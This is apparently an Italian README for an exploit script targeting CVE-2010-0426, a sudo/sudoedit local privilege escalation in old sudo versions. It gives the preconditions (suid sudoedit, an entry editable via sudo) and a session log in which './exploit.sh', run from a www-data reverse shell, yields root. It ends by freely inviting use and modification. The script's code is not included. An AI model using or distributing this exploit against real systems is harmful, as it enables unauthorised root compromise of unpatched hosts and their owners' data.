
sudo 1.6.x prima di 1.6.9p21 e 1.7.x prima di 1.7.2p4 - Escalation dei privilegi con sudo e sudoedit
https://www.cvedetails.com/cve/CVE-2010-0426/
sudo 1.6.x precedente alla 1.6.9p21 e 1.7.x precedente alla 1.7.2p4, quando è abilitato un pseudo-comando, consente una corrispondenza tra il nome del pseudo-comando e il nome di un file eseguibile in una directory arbitraria, il che consente agli utenti locali di ottenere privilegi tramite un file eseguibile appositamente predisposto, come dimostrato da un file chiamato sudoedit nella home directory di un utente.
Eleva i privilegi quando il binario sudoedit ha il permesso suid e un file può essere modificato come sudo (controlla con sudo -l)
./exploit.sh
Eleva a root da una reverse shell a bassi privilegi
www-data@g1vi:/var/tmp$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@g1vi:/var/tmp$ ./exploit.sh
[+] Target is vulnerable
[+] Running stuff...
root@g1vi:/var/tmp$ id
uid=0(root) gid=0(root) groups=0(root)
Sentiti libero di usarlo o modificarlo quando e dove preferisci.